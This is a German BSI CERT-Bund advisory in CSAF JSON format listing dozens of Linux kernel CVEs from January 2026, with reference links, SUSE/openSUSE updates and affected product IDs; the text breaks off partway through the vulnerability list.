WID-SEC-W-2026-0086
Vulnerability from csaf_certbund - Published: 2026-01-13 23:00 - Updated: 2026-02-04 23:00
Summary
Linux Kernel: Multiple Vulnerabilities
Notes
The BSI, as a provider, is responsible under the general laws for its own content that it makes available for use. Users are, however, responsible for carefully checking, in each individual case, the use and/or implementation of the information provided with the content.
Product description
The kernel is the core of the Linux operating system.
Attack
An attacker can exploit multiple vulnerabilities in the Linux kernel to carry out unspecified attacks that may lead to a denial-of-service condition or cause memory corruption.
Affected operating systems
- Linux
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Der Kernel stellt den Kern des Linux Betriebssystems dar.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen im Linux Kernel ausnutzen um nicht n\u00e4her spezifizierte Angriffe durchzuf\u00fchren, die m\u00f6glicherweise zu einer Denial-of-Service- Bedingung f\u00fchren oder eine Speicherbesch\u00e4digung verursachen k\u00f6nnen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-0086 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0086.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-0086 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0086"
},
{
"category": "external",
"summary": "Kernel CVE Announce Mailingliste",
"url": "https://lore.kernel.org/linux-cve-announce/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68767",
"url": "https://lore.kernel.org/linux-cve-announce/2026011353-CVE-2025-68767-cd16@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68768",
"url": "https://lore.kernel.org/linux-cve-announce/2026011356-CVE-2025-68768-d458@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68769",
"url": "https://lore.kernel.org/linux-cve-announce/2026011357-CVE-2025-68769-e471@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68770",
"url": "https://lore.kernel.org/linux-cve-announce/2026011357-CVE-2025-68770-6464@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68771",
"url": "https://lore.kernel.org/linux-cve-announce/2026011357-CVE-2025-68771-cf0d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68772",
"url": "https://lore.kernel.org/linux-cve-announce/2026011358-CVE-2025-68772-9d70@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68773",
"url": "https://lore.kernel.org/linux-cve-announce/2026011358-CVE-2025-68773-bd5d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68774",
"url": "https://lore.kernel.org/linux-cve-announce/2026011358-CVE-2025-68774-f2fd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68775",
"url": "https://lore.kernel.org/linux-cve-announce/2026011359-CVE-2025-68775-6e68@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68776",
"url": "https://lore.kernel.org/linux-cve-announce/2026011359-CVE-2025-68776-5aed@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68777",
"url": "https://lore.kernel.org/linux-cve-announce/2026011359-CVE-2025-68777-2073@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68778",
"url": "https://lore.kernel.org/linux-cve-announce/2026011300-CVE-2025-68778-c392@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68779",
"url": "https://lore.kernel.org/linux-cve-announce/2026011300-CVE-2025-68779-726e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68780",
"url": "https://lore.kernel.org/linux-cve-announce/2026011300-CVE-2025-68780-f5c8@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68781",
"url": "https://lore.kernel.org/linux-cve-announce/2026011301-CVE-2025-68781-f30f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68782",
"url": "https://lore.kernel.org/linux-cve-announce/2026011301-CVE-2025-68782-a72f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68783",
"url": "https://lore.kernel.org/linux-cve-announce/2026011302-CVE-2025-68783-e807@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68784",
"url": "https://lore.kernel.org/linux-cve-announce/2026011302-CVE-2025-68784-b1e0@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68785",
"url": "https://lore.kernel.org/linux-cve-announce/2026011302-CVE-2025-68785-c96c@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68786",
"url": "https://lore.kernel.org/linux-cve-announce/2026011303-CVE-2025-68786-d145@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68787",
"url": "https://lore.kernel.org/linux-cve-announce/2026011303-CVE-2025-68787-af6d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68788",
"url": "https://lore.kernel.org/linux-cve-announce/2026011303-CVE-2025-68788-05bd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68789",
"url": "https://lore.kernel.org/linux-cve-announce/2026011304-CVE-2025-68789-cca8@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68790",
"url": "https://lore.kernel.org/linux-cve-announce/2026011304-CVE-2025-68790-6166@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68791",
"url": "https://lore.kernel.org/linux-cve-announce/2026011304-CVE-2025-68791-e739@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68792",
"url": "https://lore.kernel.org/linux-cve-announce/2026011305-CVE-2025-68792-9a3f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68793",
"url": "https://lore.kernel.org/linux-cve-announce/2026011305-CVE-2025-68793-bb5f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68794",
"url": "https://lore.kernel.org/linux-cve-announce/2026011305-CVE-2025-68794-32db@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68795",
"url": "https://lore.kernel.org/linux-cve-announce/2026011306-CVE-2025-68795-4e3e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68796",
"url": "https://lore.kernel.org/linux-cve-announce/2026011306-CVE-2025-68796-9eee@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68797",
"url": "https://lore.kernel.org/linux-cve-announce/2026011306-CVE-2025-68797-b45e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68798",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68798-ea9c@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68799",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68799-b0dd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68800",
"url": "https://lore.kernel.org/linux-cve-announce/2026011307-CVE-2025-68800-39d2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68801",
"url": "https://lore.kernel.org/linux-cve-announce/2026011308-CVE-2025-68801-d3d5@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68802",
"url": "https://lore.kernel.org/linux-cve-announce/2026011308-CVE-2025-68802-a7f9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68803",
"url": "https://lore.kernel.org/linux-cve-announce/2026011309-CVE-2025-68803-d897@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68804",
"url": "https://lore.kernel.org/linux-cve-announce/2026011309-CVE-2025-68804-f10e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68805",
"url": "https://lore.kernel.org/linux-cve-announce/2026011309-CVE-2025-68805-3284@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68806",
"url": "https://lore.kernel.org/linux-cve-announce/2026011310-CVE-2025-68806-a2fb@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68807",
"url": "https://lore.kernel.org/linux-cve-announce/2026011310-CVE-2025-68807-0fd6@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68808",
"url": "https://lore.kernel.org/linux-cve-announce/2026011310-CVE-2025-68808-4cb9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68809",
"url": "https://lore.kernel.org/linux-cve-announce/2026011311-CVE-2025-68809-e875@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68810",
"url": "https://lore.kernel.org/linux-cve-announce/2026011311-CVE-2025-68810-308a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68811",
"url": "https://lore.kernel.org/linux-cve-announce/2026011311-CVE-2025-68811-7e46@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68812",
"url": "https://lore.kernel.org/linux-cve-announce/2026011312-CVE-2025-68812-4098@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68813",
"url": "https://lore.kernel.org/linux-cve-announce/2026011312-CVE-2025-68813-13a5@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68814",
"url": "https://lore.kernel.org/linux-cve-announce/2026011312-CVE-2025-68814-146a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68815",
"url": "https://lore.kernel.org/linux-cve-announce/2026011313-CVE-2025-68815-2112@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68816",
"url": "https://lore.kernel.org/linux-cve-announce/2026011313-CVE-2025-68816-e773@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68817",
"url": "https://lore.kernel.org/linux-cve-announce/2026011313-CVE-2025-68817-03ab@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68818",
"url": "https://lore.kernel.org/linux-cve-announce/2026011314-CVE-2025-68818-08ea@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68819",
"url": "https://lore.kernel.org/linux-cve-announce/2026011314-CVE-2025-68819-64a3@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68820",
"url": "https://lore.kernel.org/linux-cve-announce/2026011315-CVE-2025-68820-7a4f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68821",
"url": "https://lore.kernel.org/linux-cve-announce/2026011315-CVE-2025-68821-b515@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68822",
"url": "https://lore.kernel.org/linux-cve-announce/2026011315-CVE-2025-68822-a75d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-68823",
"url": "https://lore.kernel.org/linux-cve-announce/2026011316-CVE-2025-68823-8bf1@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71064",
"url": "https://lore.kernel.org/linux-cve-announce/2026011322-CVE-2025-71064-94ea@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71065",
"url": "https://lore.kernel.org/linux-cve-announce/2026011322-CVE-2025-71065-6818@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71066",
"url": "https://lore.kernel.org/linux-cve-announce/2026011323-CVE-2025-71066-f1fa@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71067",
"url": "https://lore.kernel.org/linux-cve-announce/2026011323-CVE-2025-71067-9c81@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71068",
"url": "https://lore.kernel.org/linux-cve-announce/2026011323-CVE-2025-71068-f1a9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71069",
"url": "https://lore.kernel.org/linux-cve-announce/2026011324-CVE-2025-71069-33d4@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71070",
"url": "https://lore.kernel.org/linux-cve-announce/2026011324-CVE-2025-71070-b6c2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71071",
"url": "https://lore.kernel.org/linux-cve-announce/2026011325-CVE-2025-71071-67e9@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71072",
"url": "https://lore.kernel.org/linux-cve-announce/2026011325-CVE-2025-71072-b52b@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71073",
"url": "https://lore.kernel.org/linux-cve-announce/2026011325-CVE-2025-71073-b002@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71074",
"url": "https://lore.kernel.org/linux-cve-announce/2026011326-CVE-2025-71074-f3ed@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71075",
"url": "https://lore.kernel.org/linux-cve-announce/2026011326-CVE-2025-71075-c85d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71076",
"url": "https://lore.kernel.org/linux-cve-announce/2026011326-CVE-2025-71076-19ff@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71077",
"url": "https://lore.kernel.org/linux-cve-announce/2026011327-CVE-2025-71077-6e08@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71078",
"url": "https://lore.kernel.org/linux-cve-announce/2026011337-CVE-2025-71078-9a51@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71079",
"url": "https://lore.kernel.org/linux-cve-announce/2026011338-CVE-2025-71079-9f24@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71080",
"url": "https://lore.kernel.org/linux-cve-announce/2026011338-CVE-2025-71080-f9ae@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71081",
"url": "https://lore.kernel.org/linux-cve-announce/2026011338-CVE-2025-71081-df43@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71082",
"url": "https://lore.kernel.org/linux-cve-announce/2026011339-CVE-2025-71082-ef8a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71083",
"url": "https://lore.kernel.org/linux-cve-announce/2026011339-CVE-2025-71083-ddb3@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71084",
"url": "https://lore.kernel.org/linux-cve-announce/2026011339-CVE-2025-71084-52a2@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71085",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71085-e6c1@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71086",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71086-18be@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71087",
"url": "https://lore.kernel.org/linux-cve-announce/2026011340-CVE-2025-71087-53c4@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71088",
"url": "https://lore.kernel.org/linux-cve-announce/2026011341-CVE-2025-71088-9436@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71089",
"url": "https://lore.kernel.org/linux-cve-announce/2026011341-CVE-2025-71089-a642@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71090",
"url": "https://lore.kernel.org/linux-cve-announce/2026011341-CVE-2025-71090-6e3a@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71091",
"url": "https://lore.kernel.org/linux-cve-announce/2026011342-CVE-2025-71091-860d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71092",
"url": "https://lore.kernel.org/linux-cve-announce/2026011342-CVE-2025-71092-9f73@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71093",
"url": "https://lore.kernel.org/linux-cve-announce/2026011343-CVE-2025-71093-387f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71094",
"url": "https://lore.kernel.org/linux-cve-announce/2026011343-CVE-2025-71094-087b@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71095",
"url": "https://lore.kernel.org/linux-cve-announce/2026011343-CVE-2025-71095-6fad@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71096",
"url": "https://lore.kernel.org/linux-cve-announce/2026011344-CVE-2025-71096-fb73@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71097",
"url": "https://lore.kernel.org/linux-cve-announce/2026011344-CVE-2025-71097-7cfc@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71098",
"url": "https://lore.kernel.org/linux-cve-announce/2026011344-CVE-2025-71098-ef6d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71099",
"url": "https://lore.kernel.org/linux-cve-announce/2026011345-CVE-2025-71099-b6f8@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71100",
"url": "https://lore.kernel.org/linux-cve-announce/2026011345-CVE-2025-71100-537f@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2025-71101",
"url": "https://lore.kernel.org/linux-cve-announce/2026011345-CVE-2025-71101-1886@gregkh/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0350-1 vom 2026-01-30",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-January/024000.html"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20145-1 vom 2026-02-03",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/FIKVKDA42VXBWDNHA6WP345IDVA2E3XU/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0369-1 vom 2026-02-03",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024037.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20207-1 vom 2026-02-04",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024052.html"
}
],
"source_lang": "en-US",
"title": "Linux Kernel: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-02-04T23:00:00.000+00:00",
"generator": {
"date": "2026-02-05T09:40:46.600+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-0086",
"initial_release_date": "2026-01-13T23:00:00.000+00:00",
"revision_history": [
{
"date": "2026-01-13T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-02-01T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-02-03T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von openSUSE und SUSE aufgenommen"
},
{
"date": "2026-02-04T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Open Source Linux Kernel",
"product": {
"name": "Open Source Linux Kernel",
"product_id": "T049905",
"product_identification_helper": {
"cpe": "cpe:/o:linux:linux_kernel:-"
}
}
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-68767",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68767"
},
{
"cve": "CVE-2025-68768",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68769",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68769"
},
{
"cve": "CVE-2025-68770",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68772",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68772"
},
{
"cve": "CVE-2025-68773",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68774",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68774"
},
{
"cve": "CVE-2025-68775",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68779",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68779"
},
{
"cve": "CVE-2025-68780",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68780"
},
{
"cve": "CVE-2025-68781",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68781"
},
{
"cve": "CVE-2025-68782",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68782"
},
{
"cve": "CVE-2025-68783",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68784",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68784"
},
{
"cve": "CVE-2025-68785",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68785"
},
{
"cve": "CVE-2025-68786",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68786"
},
{
"cve": "CVE-2025-68787",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68787"
},
{
"cve": "CVE-2025-68788",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68790",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68790"
},
{
"cve": "CVE-2025-68791",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68791"
},
{
"cve": "CVE-2025-68792",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68792"
},
{
"cve": "CVE-2025-68793",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68793"
},
{
"cve": "CVE-2025-68794",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68794"
},
{
"cve": "CVE-2025-68795",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68796",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68796"
},
{
"cve": "CVE-2025-68797",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68799",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68799"
},
{
"cve": "CVE-2025-68800",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68802",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68805",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68805"
},
{
"cve": "CVE-2025-68806",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68806"
},
{
"cve": "CVE-2025-68807",
"product_status": {
"known_affected": [
"T002207",
